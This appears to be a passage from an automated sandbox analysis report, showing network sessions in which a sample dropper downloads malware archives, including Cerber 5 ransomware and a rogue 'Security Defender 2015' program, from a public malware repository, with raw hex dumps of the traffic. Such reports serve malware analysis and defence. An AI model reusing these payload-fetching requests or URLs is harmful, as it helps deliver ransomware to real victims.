                                                                                                                                                            2022-09-29 12:45:22 UTC31717INData Raw: 33 ae e9 ce 6e f7 99 66 b5 e9 2d da 90 fd d1 05 66 40 8d b6 9a 34 99 64 da 98 77 0a 56 14 38 2e 4f 17 9c c1 b2 59 8a cd 9b 01 16 fd 8e 91 fe 3f a9 fc 9d e4 53 a4 20 97 3e fc 49 7e b7 a1 93 fd 5a 4a 10 f4 7b ae 76 82 7f b4 87 e6 06 5d bc fd 96 2d f5 04 48 88 09 46 94 89 44 22 a0 f2 e1 c9 97 73 71 1a 52 c4 ea e6 93 4c 3c 23 ae 05 19 02 43 b9 8a 19 b2 64 73 7d c5 70 6f fb 57 ed 38 8e a8 5a 51 71 7b 45 27 b8 23 c3 22 99 61 fb 85 6d 7f cd 7c 08 89 47 f2 4b b6 9e cb 60 29 a1 90 1c 92 29 5a 8b 51 69 f4 22 56 02 aa 1f a4 54 92 61 94 39 4d 43 d1 44 84 f2 93 92 c4 dc 47 ea 37 f6 22 17 c8 87 a3 5f 92 49 7a 67 64 a0 27 ec 32 b6 01 a2 8b e0 ee 3c 74 78 31 58 60 ec f1 b7 24 99 7d 6d d2 c0 c5 64 42 50 67 7f 42 0f a8 6a a8 70 a1 41 69 28 19 43 75 03 fc 03 00 f8 46 fc aa
                                                                                                                                                            Data Ascii: 3nf-f@4dwV8.OY?S >I~ZJ{v]-HFD"sqRL<#Cds}poW8ZQq{E'#"am|GK`))ZQi"VTa9MCDG7"_Izgd'2<tx1X`$}mdBPgBjpAi(CuF
                                                                                                                                                            2022-09-29 12:45:22 UTC31733INData Raw: 84 62 6c 46 90 07 24 fb 25 87 e5 35 fe dc 7c c7 2b 2d 09 55 f5 50 d2 54 93 0b 43 00 5b 82 a2 11 51 2f 7e a8 1d 13 d0 e5 9f 80 00 36 9a 7d d6 43 ef 8c c5 0b 8a 7d 70 53 e7 15 25 8e 81 d0 07 6a 1b 21 be 06 c7 57 d5 60 bc 34 dc 61 73 2b 43 e0 f9 6f 08 6f 50 39 81 2d 10 da 05 c0 bc 24 1c 7f 3a a9 3b 44 e1 d1 68 6d be d6 50 95 45 83 47 3c 37 00 eb 49 65 46 3e f7 26 73 2c d5 5e c9 30 b5 01 38 be 7f 6f 84 7c 34 f6 a9 a6 ff b9 c8 fe 06 a8 b3 47 65 05 a3 92 6b 1c df 9f 8b 1c 27 6f 54 e8 6b 70 e3 75 d8 72 d0 12 5c 2b 56 3f a6 f0 90 f3 a4 b1 ab f0 79 33 c0 d3 9a cb 72 18 6f ce 12 b3 94 5d f6 09 86 a3 48 46 9e 6a 2a 99 0e 75 58 d3 4f 9f c2 9c d0 b3 8f 2e 4c 4c c8 fb d5 53 05 80 26 f5 5e ea 92 b0 e7 ec b3 68 12 d9 36 f8 8e 4e a4 b0 ad f5 85 e8 8a 67 1a b2 96 ad bf 1b
                                                                                                                                                            Data Ascii: blF$%5|+-UPTC[Q/~6}C}pS%j!W`4as+CooP9-$:;DhmPEG<7IeF>&s,^08o|4Gek'oTkpur\+V?y3ro]HFj*uXO.LLS&^h6Ng
                                                                                                                                                            2022-09-29 12:45:22 UTC31738INData Raw: 31 25 1b 2b ed 94 73 78 94 6a aa 31 07 07 e8 a1 ce bc 03 bf c2 a8 5e d5 ee 52 de 52 05 5f 4e 23 c7 74 93 9b a9 df fa a9 2f a3 7e 57 91 05 38 d1 bb f3 2d 98 5b 36 ad 4d e3 30 b8 ad 0e 49 3d 88 42 1b 96 1f a8 7d 56 2e 56 77 7e a8 d1 cd 29 b2 a1 d7 a3 ed e0 62 08 95 df b2 16 5a 08 bc 44 45 30 67 e2 ff 46 dd 6f 69 8e b4 3f 18 e3 03 db a0 82 33 2b eb 12 3b 63 59 78 1d a9 9f 3b b5 88 03 06 52 37 bd 2b 0f 5b 9e b8 16 58 1e fa a3 45 29 36 61 ee 53 15 34 f1 28 9f 31 2f d9 03 c3 0f 87 21 dc 46 e9 41 b9 3d 68 4f 2f bf 9b e2 af dd 07 5a 32 49 4c ac 68 65 44 35 62 78 cb f9 66 c3 68 dc 69 3e c6 43 08 fc 37 c5 4b 85 fc 6d f3 aa 19 79 51 ab bd 57 f7 ca 64 79 fe 5c 22 a3 cb 14 52 51 aa 30 49 c7 8a 32 38 bb d5 75 f4 87 48 3c ed f9 4e 9a 57 48 3b 2e ba 28 1d 3b 02 76 27 90
                                                                                                                                                            Data Ascii: 1%+sxj1^RR_N#t/~W8-[6M0I=B}V.Vw~)bZDE0gFoi?3+;cYx;R7+[XE)6aS4(1/!FA=hO/Z2ILheD5bxfhi>C7KmyQWdy\"RQ0I28uH<NWH;.(;v'
                                                                                                                                                            2022-09-29 12:45:22 UTC31754INData Raw: bf a8 a4 90 5f 55 38 ef f7 5a c1 45 0a 02 a0 b2 38 71 2c 4c 40 3a ee 76 f4 6a b5 54 75 ae 04 f0 47 0b 4d 2d 3c 29 15 e2 14 34 ed e9 d6 60 6f 2d 90 9a 48 72 2c 7d bf a4 14 d9 66 84 41 d5 9e c6 83 1a 52 c9 c9 de 3a c3 ac fa 4f 16 18 1a a2 a7 87 29 97 5a e9 84 71 b7 97 08 a1 6b 31 24 ec c7 06 08 c9 6e 81 25 8d c9 ee c4 7f 5e 57 5d 90 61 b0 92 f4 28 82 4b 68 aa cc bb 9b 34 d5 90 7f 6f c7 17 73 fa bc 0d f6 62 c8 92 8e 8f 35 c7 59 cb 9a 67 60 df 05 36 29 2c 14 d9 ea 69 2d 7d 27 f1 c1 79 b8 62 84 e8 4a e9 10 0e 22 49 8c 70 08 87 13 f9 f7 09 a1 9c 36 af 52 26 8b ef 80 ee 77 bd f7 c7 18 24 a9 ce 2c 87 3c 41 00 4e cf ca 82 ab fe 04 02 31 16 ea b7 17 e5 e2 92 53 c5 88 11 29 a8 04 02 f3 71 9e 66 f6 83 7e 80 31 8d fb cd 08 f3 43 70 27 03 65 50 7e 6c 84 9b 1b b1 ef a8
                                                                                                                                                            Data Ascii: _U8ZE8q,L@:vjTuGM-<)4`o-Hr,}fAR:O)Zqk1$n%^W]a(Kh4osb5Yg`6),i-}'ybJ"Ip6R&w$,<AN1S)qf~1Cp'eP~l
                                                                                                                                                            2022-09-29 12:45:22 UTC31770INData Raw: e6 f6 d9 79 87 b8 fa 87 35 e4 9b 13 31 f7 87 7c fa df 4f 76 37 40 e0 11 4e dd 86 14 47 cd b6 b5 a5 d8 c8 8c df 95 50 33 34 d3 57 2f 98 5f b7 27 c1 79 cd 7b 57 a7 76 27 65 df ed 3d 1a a9 22 87 bc 49 a1 da 74 d8 e0 43 57 9f 3f 4a 37 c3 b7 be e1 d2 9b d8 84 b4 b8 76 b9 34 b2 1e 70 63 bf 62 38 90 b9 e5 53 6e be 83 4d d3 4c f2 d6 38 26 a4 1a e4 6b 98 23 fa 82 2d e4 73 4e 45 fa 6f 96 e9 3c 31 82 cb 98 80 da 8e d8 95 83 57 48 5f 1e b1 7a e3 96 dd 7c 5e bd 9f b8 02 df ef c4 29 1d 59 30 5b 82 e3 26 cb 8d 2e 6f d4 01 4d 19 0a 78 22 93 95 5c 4f 65 25 17 66 76 d0 2b de 9c d0 d6 9b 83 8b 1d f6 12 d4 4a 6d 83 9f fd cc 6f 0e 05 b3 09 58 14 6c 85 23 d7 b9 72 41 67 05 8a 17 c7 11 b7 4a 33 3b ac 6c 8b 87 c7 36 00 2e 35 bf 4b 4e 63 1a 67 5e 9f b3 51 ae 18 a1 fa 10 4d 85 de
                                                                                                                                                            Data Ascii: y51|Ov7@NGP34W/_'y{Wv'e="ItCW?J7v4pcb8SnML8&k#-sNEo<1WH_z|^)Y0[&.oMx"\Oe%fv+JmoXl#rAgJ3;l6.5KNcg^QM
                                                                                                                                                            2022-09-29 12:45:22 UTC31786INData Raw: b4 12 5f a5 b4 23 89 7a 01 b4 bd 53 00 07 24 8c 81 ba aa e3 e1 26 af ef 5e 51 9d e4 62 a8 97 02 0d f5 f7 76 6f a2 35 15 7c ea 6e 16 49 f3 26 6b 12 38 a8 19 48 70 23 d4 b7 ca c5 07 3d fc 52 22 54 03 99 2c 11 fb 7c 1b 9c cf 54 53 11 29 e1 33 97 71 3b b0 25 f6 6c da c1 ae eb 47 71 28 94 87 48 c0 6f 5b ea 5d a3 1d 01 72 3c c0 ec 32 04 88 d0 e5 22 8a 60 f5 fa a0 85 79 1d b6 ea 05 f4 da 48 0c 9c 86 bd c4 11 c7 4a 33 1c 5b a5 d8 b2 51 ae 2a 35 33 e9 01 65 75 e0 98 3d a7 54 f0 cf 3a fb 55 4c bd 64 f2 ef 1f 85 2d 96 e3 ac f5 99 e5 68 c1 ab ac f9 89 c0 2a b7 a5 ca b6 7c 0d c5 bb 63 e1 23 65 8c 5d 97 8d c1 58 e0 e9 55 83 df 22 5b 16 55 f0 24 49 d6 46 cd 70 66 67 27 10 b3 75 e4 ff 41 48 fe 68 c0 0e e6 3f db 0d d6 ac 7b 1f e0 3d 29 ba 42 9b 7b 06 2c d8 c2 5e ae 63 25
                                                                                                                                                            Data Ascii: _#zS$&^Qbvo5|nI&k8Hp#=R"T,|TS)3q;%lGq(Ho[]r<2"`yHJ3[Q*53eu=T:ULd-h*|c#e]XU"[U$IFpfg'uAHh?{=)B{,^c%
                                                                                                                                                            2022-09-29 12:45:22 UTC31802INData Raw: 03 d2 65 5d 71 68 86 ca ca 05 7b a1 f0 79 09 e9 1f 9e a0 bf 35 af b9 93 65 d9 93 2b 2c c4 f2 a9 7a 60 50 14 f9 94 4d 67 f4 37 12 25 f0 a7 18 d0 c9 cb 93 17 2f 0f a5 6f bc e2 59 f1 b1 80 a9 d2 37 80 54 3a 24 d7 03 6e 92 5b c6 22 0f 19 9c ae 5e 0b 80 25 f0 f1 59 22 96 4b e6 14 05 07 de ed 87 17 fb 60 cb a8 a3 56 9d 86 b3 35 c0 21 5a c0 b5 da 29 02 e5 6d a0 cf e4 d4 49 97 89 8c 04 40 41 05 43 8d e1 3c fc 40 14 1d 1f 69 7f f4 1f fa 33 a5 47 90 6c 93 a7 20 6d 85 b8 45 e6 27 d9 f2 09 c2 7d e3 45 4c 34 af 98 0c b3 ac 2a 99 14 dd 52 f4 ed ce 2b db da d0 47 3d cb ca 93 c6 cd 9e 6e 9b 2b 4e 5c 98 d2 7b 38 57 52 9e 97 5f a0 1d 66 10 29 25 97 8e e0 3c 9d cb 5f c9 5a d4 92 08 49 fb bf 54 99 54 d8 1b 89 2e 1a c5 d6 77 80 11 13 28 f0 43 b9 b3 61 21 66 df 28 3a 43 14 17
                                                                                                                                                            Data Ascii: e]qh{y5e+,z`PMg7%/oY7T:$n["^%Y"K`V5!Z)mI@AC<@i3Gl mE'}EL4*R+G=n+N\{8WR_f)%<_ZITT.w(Ca!f(:C
                                                                                                                                                            2022-09-29 12:45:22 UTC31818INData Raw: d3 02 ad 30 9e bb 4e c0 8e 66 37 d9 b3 0c ca 41 c6 c1 37 7c d1 06 54 3b 6c a8 96 4e a4 39 c8 9f 84 33 48 37 f2 ab 3c b8 2a c4 f0 77 c3 99 35 6b c6 03 f1 e9 ac d1 e7 ea 5e 86 b7 12 de ab 44 a7 68 dc 53 d7 fb d6 be 84 15 20 65 db b4 f6 70 54 73 df 88 05 51 7f f0 5c c7 c9 63 28 bc 2c dc 23 d1 e5 ee 3d 60 12 91 0d 33 bc 08 00 73 b2 e1 02 fd db aa e3 7b f3 61 52 04 1b 73 4c b6 fc dd e2 db 79 d5 a2 77 08 0d a4 06 bd df e7 ea e5 f8 b5 d2 0d b7 6b fc 36 54 79 68 3e 05 78 3c 86 b7 e4 48 0d d2 bb 42 a9 3b e2 1f 25 bc 6d bd 44 21 61 9e c9 5a 01 2b 2e b6 c4 c4 aa 47 69 41 cc 60 9b 6d af 38 5a eb 1b 77 d9 15 56 d9 28 03 44 ac 45 f1 fc 8f 3e 7d 17 c6 7b 4b cf 79 67 bb 22 cd ec 08 e0 c7 28 c6 61 6b 28 3d 76 f7 db 73 78 5a 1d 1c 7f 0c 11 2c 9d d8 71 e7 13 71 2d 3b 5d d8
                                                                                                                                                            Data Ascii: 0Nf7A7|T;lN93H7<*w5k^DhS epTsQ\c(,#=`3s{aRsLywk6Tyh>x<HB;%mD!aZ+.GiA`m8ZwV(DE>}{Kyg"(ak(=vsxZ,qq-;]
                                                                                                                                                            2022-09-29 12:45:22 UTC31834INData Raw: 13 35 f7 38 09 59 a4 66 24 f0 f6 37 89 f6 3b bf e9 4c 79 c0 cf 1d f1 fe b9 46 98 aa 66 8b 15 d3 a1 eb 6e b7 48 f4 92 3d bc 55 b0 01 3f 9b 2c 3c 52 35 1c 63 3a 98 77 09 d6 34 dc d7 6b ca fb ab 61 4d 24 17 1d 71 43 d0 a7 a4 09 e0 0a 05 e3 b6 08 69 7f 13 41 bf 2d 5f 19 64 36 31 30 8c e4 36 dc 03 49 3d 15 d0 01 b2 9e cb 9a c5 69 a4 4f 83 7b 74 aa 28 f9 7b 50 74 08 da 7e 96 b9 92 1f 35 5b 0f ef 65 84 04 2b b7 35 ae d4 c0 86 f8 77 f4 63 06 e4 bb 2d f2 10 ef 78 6e 6e 2f f8 ba 78 b4 d3 73 28 7e 78 c9 23 35 90 0a 56 f4 91 6e c8 ff 32 20 23 96 6a 07 17 8a e8 f1 19 04 69 a0 f3 c3 32 6d db 3c 0f 95 b3 f4 d7 14 c8 ae 74 d3 1c 59 e2 a5 90 60 8b af 57 3c ec eb 6e ec 05 05 47 a7 46 bb 38 df 70 02 9e f1 a1 1a 43 b1 73 66 43 a6 96 ba 08 6d 2c b2 5e 33 62 af 7e 25 48 17 ac
                                                                                                                                                            Data Ascii: 58Yf$7;LyFfnH=U?,<R5c:w4kaM$qCiA-_d6106I=iO{t({Pt~5[e+5wc-xnn/xs(~x#5Vn2 #ji2m<tY`W<nGF8pCsfCm,^3b~%H
                                                                                                                                                            2022-09-29 12:45:22 UTC31850INData Raw: c9 6d f6 65 0f 65 db 5c 9e e3 78 6a e4 7b 38 5a e7 5a 1a 6c c4 ed 6a 19 d2 10 e8 0b 71 55 2b f1 f6 4a db f6 25 4a 2a 54 4b ff 3b 58 4e c5 02 d7 aa 9a 1c cd 9b c6 43 f4 de 95 25 24 5d 6a 9a f6 6a 06 5e 48 4f 04 49 3f e7 db 95 f7 5b 56 19 e0 9b 2d db 1b 25 a4 a4 e5 ce bd 73 64 a5 47 ac ed b8 cc cb b4 d9 31 21 b5 8d 2c 58 0e 7a c4 df e2 34 dc 93 a4 23 43 46 fe 0b 85 fb 15 37 12 e3 ce 8e 81 7b e8 a5 bd 63 0a 36 be c2 ef 0c d1 f1 ff fa 0d 1d c3 cf 8d 68 d4 73 db ed b2 4a 3a b8 1d 83 ce db 51 de 31 e7 06 50 43 44 43 87 5f eb af 2f de 3d 4e 3b 32 f8 46 fe 25 bc d4 0c 46 68 96 3e 15 b0 4a 12 29 56 d5 fa 28 cf f6 45 e8 5b 0c d3 8a ca 37 8b c0 87 b9 0b 62 16 b7 45 60 cb 9e b2 e7 b4 65 24 e1 ce ba c3 51 7b a6 9d 7d 60 bb ce 6e 79 1e 5d 50 a4 be 20 c5 1b 76 e1 13 7a
                                                                                                                                                            Data Ascii: mee\xj{8ZZljqU+J%J*TK;XNC%$]jj^HOI?[V-%sdG1!,Xz4#CF7{c6hsJ:Q1PCDC_/=N;2F%Fh>J)V(E[7bE`e$Q{}`ny]P vz
                                                                                                                                                            2022-09-29 12:45:22 UTC31866INData Raw: 9e 39 25 bb cf ef c9 e5 76 c0 e7 03 41 59 fc 44 af cd 73 6d cb 51 b3 65 a9 c1 d7 1f a6 8c a9 92 40 92 1b c3 10 53 c9 4f ec c3 e1 f1 fa 8a 11 3a 8f 2b b0 65 3b 7e 82 b0 14 26 7f 1d 25 84 52 6e 86 49 6d 43 ee 32 d2 8b 93 bd bb cd 4e b7 d9 01 db b5 1c 7a 1a 08 71 0a 58 87 f8 42 d2 85 bd f4 5b 6b b0 37 95 82 ad ea 9a 05 f4 d9 f2 26 18 fa 52 2b cc e5 45 79 14 d9 ab fa a4 f3 00 ee 77 e6 e8 3c 10 cf 7b 2c f5 5e 8e f8 6a 74 91 15 80 42 b1 dc a1 31 76 27 5c 36 25 62 d4 12 78 eb ac 2d b9 db c4 24 9d c5 25 e4 e2 83 31 f7 55 46 8d 52 8a 92 e5 0d 24 b1 7a 11 b6 a6 69 a3 3a 61 86 12 69 e7 14 5a fd aa 71 a4 ca ba 8d 15 cf 7f 7d 94 84 81 25 fa eb 71 04 9e ec 55 a4 cf c4 03 28 a2 f4 ce 90 87 4e 82 46 fb 14 92 98 3f 5e 20 82 e5 fa 4d 02 27 f8 2b c8 28 dc 9e 4e dc cf 08 3f
                                                                                                                                                            Data Ascii: 9%vAYDsmQe@SO:+e;~&%RnImC2NzqXB[k7&R+Eyw<{,^jtB1v'\6%bx-$%1UFR$zi:aiZq}%qU(NF?^ M'+(N?
                                                                                                                                                            2022-09-29 12:45:22 UTC31882INData Raw: 2b 60 79 86 a4 e4 3a 07 86 ce eb f9 a2 65 ad bf e8 0c b6 c4 10 fb 66 4a c9 55 0a bf 03 07 7f 73 e8 08 bc ac 2a f2 fa 6f 06 8f de e6 ab 8a 90 48 cd ad 9c 88 a2 18 fd d6 ab 52 f2 ea 80 c2 de 2d b4 57 ed fc 10 5c ab 09 77 e3 d7 37 de 47 bb c5 f8 cb 5c a2 27 fc 3a 6f 7e 24 54 2e 1a d2 d2 e4 84 90 60 f8 7a b5 c1 33 c2 78 43 60 f4 4f 6b cc 59 19 99 dc 53 c6 22 65 33 4d 69 c0 c0 38 22 9e 2a 7d 20 68 dd f8 98 d0 bc c3 18 4e 41 4d de ac 84 af 93 1d de a3 0e b9 bb 0a 3f d3 3f 3c 8a 0f 1a 40 e9 70 ab a5 e0 b1 ab 95 37 49 b5 9f 0d 92 5e 69 d0 de 9d c2 cf 8f 10 e3 8a 1a f9 6e a6 cc ba 52 bd 58 e4 1e cd 90 e4 a1 c2 4c a8 18 fc ca d8 2f 03 4f 47 31 3c 6b 71 22 53 9e 37 08 2d d4 eb 52 d5 bc a3 a6 7b 48 83 e5 0d b3 66 95 9c 86 67 63 68 b7 06 e5 d5 1d 7a 32 27 1a 34 91 b6
                                                                                                                                                            Data Ascii: +`y:efJUs*oHR-W\w7G\':o~$T.`z3xC`OkYS"e3Mi8"*} hNAM??<@p7I^inRXL/OG1<kq"S7-R{Hfgchz2'4
                                                                                                                                                            2022-09-29 12:45:22 UTC31898INData Raw: c4 9e b1 90 49 5c 12 96 3b 98 44 3c 00 8c e0 0a 58 6b 32 db 31 63 96 6b 77 3d 24 37 53 da 3e e8 e0 d3 b8 05 46 ad 4a ba d7 b0 73 c1 5b eb 5f 90 b2 ec 51 51 2e 9f f3 66 ea b1 86 8c c8 ab 73 34 79 f6 9c d2 63 2c 4c ac 40 ee c4 19 79 14 e2 9f f3 8c bb 19 c6 28 a3 17 d3 01 9b 92 89 2a 34 87 0d e4 41 86 28 6a 4d 01 7f ae ef 67 36 7a 94 c5 a0 c8 dc 3f 09 5c 5c 14 c0 42 48 8d 56 8c d8 49 a1 e0 13 cd 7c 0b d5 07 ba 9b 2e da e5 66 5c ec be 80 cc d1 52 e2 c9 64 ea fd a5 c2 1b 4b 54 8a 5f 2c 23 5b 80 77 72 d2 e5 63 6e ba e7 2c 57 d5 55 1c e3 20 d6 fb de d6 8b 47 34 55 4b ff d8 5b 0d c8 2f 0c 48 2e f6 db d5 59 35 a5 08 8c e0 c8 b9 7c bf f1 20 6f 62 06 68 eb 75 9f b6 3d 68 c2 aa e7 66 e1 93 f2 80 2e af cf 9b 68 ed 85 21 83 d4 7d 72 2a 7b c2 a6 46 c1 40 cb 2d 7e 5e 3e
                                                                                                                                                            Data Ascii: I\;D<Xk21ckw=$7S>FJs[_QQ.fs4yc,L@y(*4A(jMg6z?\\BHVI|.f\RdKT_,#[wrcn,WU G4UK[/H.Y5| obhu=hf.h!}r*{F@-~^>
                                                                                                                                                            2022-09-29 12:45:22 UTC31914INData Raw: 50 a8 1f a5 75 4c b8 a6 c8 8e 93 3b 11 65 8c 09 ca 5b 6b 21 12 d3 ad 71 59 a7 32 81 b9 76 8e 58 be bf d6 b1 f2 96 44 b5 7f c0 75 00 b3 c4 a3 66 90 c4 91 c5 af 1d b7 03 7b fc 97 1f 7c 6e 60 bb 1c aa 8c b4 90 a2 9e d2 f0 bf 6b c9 c8 41 8d ec b9 2e 2e 2c 73 57 38 4d 30 6c f7 7b a1 13 8a b7 25 81 0c aa 10 58 c0 6d 6c ba 57 11 f3 79 6b 2b 3e ab 19 10 cf 10 34 bd 2f c0 23 26 c1 0d ed 59 ac a3 e9 7a b9 0f 2e 21 ca 2d 4f 2c c0 45 13 50 76 cc 12 25 ce 35 8f 6f 73 37 51 de 83 e0 94 d5 42 d0 e4 6f 85 e9 c9 f0 e7 44 59 b3 fc 47 fd 9d 03 c3 fe d4 24 d3 9f 20 43 af 2a 01 af fc ce 22 ee 1c 1c ae 4b a7 a9 b0 8b 57 44 c1 23 a4 e0 7a 00 98 37 e9 97 fe d1 19 0f 0f d6 2f 6a f5 86 ce 73 eb c7 98 23 24 aa ad 47 54 a5 af b9 e2 84 09 50 33 b6 c9 66 7b c7 6c f0 b8 bf 0a d6 6b 30
                                                                                                                                                            Data Ascii: PuL;e[k!qY2vXDuf{|n`kA..,sW8M0l{%XmlWyk+>4/#&Yz.!-O,EPv%5os7QBoDYG$ C*"KWD#z7/js#$GTP3f{lk0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            118192.168.2.649767140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:23 UTC31914OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender%202015.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            119140.82.121.4443192.168.2.649767C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:23 UTC31915INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:11 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Defender%202015.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:23 UTC31915INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            12192.168.2.649714185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:48 UTC517OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            120192.168.2.649768185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:23 UTC31917OUTGET /Endermanch/MalwareDatabase/master/rogues/Security%20Defender%202015.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            121185.199.110.133443192.168.2.649768C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:23 UTC31917INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 470947
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "1119843b6af6d35fb9a350e92c8c020a400ec45ae6f14abd60e6e3e267b6af12"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 0805:8530:1072606:116E222:63359363
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:23 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6952-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455524.520142,VS0,VE188
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: be84a8ee539b73706a9e7696535f6bed2881e866
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:23 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:45:23 UTC31918INData Raw: 50 4b 03 04 14 00 01 00 08 00 d8 8d 30 47 ec 96 77 b6 d9 2e 07 00 00 32 13 00 22 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 53 65 63 75 72 69 74 79 44 65 66 65 6e 65 72 32 30 31 35 2e 65 78 65 fc a2 85 cd 48 a8 cb 5b ea 52 b4 a7 55 07 e0 72 50 f2 9a 8f 26 cf dd b3 13 0e d4 da 9e fd d9 33 85 ab dc de ef 39 35 f9 9d a8 56 76 a8 e6 14 24 bb 5a a2 7b c3 1e 12 24 db b0 eb 28 23 7d e7 ae b5 ae 9e 7d 59 25 c6 0e aa 95 06 2a ad c0 dd 82 09 0c 35 62 8a 02 2f 79 fb 8e f8 56 c2 f2 b2 4b 17 5c 4b 2b 94 0d 50 b1 86 40 bf ad 94 cc e9 94 5b 86 01 e3 6b 41 67 a4 f0 10 e6 56 74 76 36 81 f9 09 01 b3 40 1e cd 86 4d fc 63 49 0b e0 b1 b7 27 f6 66 dd 48 4a d2 a5 78 e9 08 76 ca a5 0e 8e 40 43 ec f2 09 1e 88 7a f5 0e 20 0e 5d 9e 50 b9 5e f1 00 46 79 00 14 85 11 04 8f b2 26 51 c4
                                                                                                                                                            Data Ascii: PK0Gw.2"Endermanch@SecurityDefener2015.exeH[RUrP&395Vv$Z{$(#}}Y%*5b/yVK\K+P@[kAgVtv6@McI'fHJxv@Cz ]P^Fy&Q
